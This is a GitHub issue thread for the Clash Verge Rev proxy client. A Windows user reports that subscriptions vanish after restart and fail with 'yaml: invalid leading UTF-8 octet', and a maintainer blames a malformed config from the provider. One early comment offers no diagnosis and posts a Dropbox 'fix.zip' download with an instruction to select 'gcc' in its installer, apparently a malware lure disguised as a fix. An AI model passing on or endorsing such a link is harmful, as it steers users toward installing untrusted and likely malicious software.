### ISSUE TITLE
[BUG] 新的问题：一个是保存订阅内容问题，一个是无法订阅的问题（UTF-8）

### ISSUE THREAD

**Issue by geniusNFIL** [clash-verge-rev/clash-verge-rev#1631]
### 问题描述 / Describe the bug

![image](https://github.com/user-attachments/assets/fec00955-abbb-46aa-adc0-422f958fb1d0)
图片内容是无法订阅问题，提示：yaml: invalid leading UTF-8 octet
这个问题不是说通过链接获取订阅内容会失败，而是说它会提示成功，但是，在“代理”界面上，会显示这个问题。
![image](https://github.com/user-attachments/assets/907c0b40-4a5d-4b6c-bb14-d9b855c182d6)

### 复现步骤 / To Reproduce

复现步骤就涉及到第一个问题了：每次提示订阅成功后，如果重新打开clash，那么在订阅一栏一面，就没有我之前订阅的内容。
（图片上传了几次，都没有显示，真的烦）
![image](https://github.com/user-attachments/assets/a273204a-c166-4c14-8f9e-3e389e8c148a)

然后重新粘贴链接后，进行获取最新的节点，它会提示获取成功，
![image](https://github.com/user-attachments/assets/10a246e8-1fde-489c-8a27-00f707731ab4)
然后我去“代理界面”一看，一片白板，
![image](https://github.com/user-attachments/assets/0ee63a71-1250-47c2-a1c5-02b5d1d39531)

然后回到“订阅界面”，订阅的它还在：然后右键选择它，然后点使用，就出现：yaml: invalid leading UTF-8 octet，
![image](https://github.com/user-attachments/assets/c56da089-1c4d-43d7-86d0-1a0126ef25db)

挺奇怪的，我的订阅节点没问题的，之前一直使用的clash都行，现在用手机端的clash也行，所以不是我订阅节点问题。

### 操作系统 / OS

Windows

### 操作系统版本 / OS Version

Windows 11 专业版 23H2 22631.4037

### 日志 / Log

日志如下：
![image](https://github.com/user-attachments/assets/5f558e2c-b66d-4628-8c29-43b1da90275a)

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by wonfen** [comment]
目测是你机场尝试下发兼容meta内核的订阅，但格式有问题，找你的机场反馈去。

**Comment by geniusNFIL** [comment]
额，但是我手机端，目前使用没问题啊

**Comment by wonfen** [comment]
> 额，但是我手机端，目前使用没问题啊

机场会根据设备和软件的UA下发不同的配置，手机下发的可能完全是另外一个配置。

订阅卡片点编辑看看里面有没有红线报错。

**Comment by geniusNFIL** [comment]
没有红线报错的，好奇怪，之前的clash版本还没出现这种问题，当时1.7.5出来时，我更新clash使用没问题。

**Comment by wonfen** [comment]
订阅连接私我 @wonfen_bot

**Comment by worisur** [comment]
我也是相同的问题，但是我的报错是 failed to put configs with status "401"
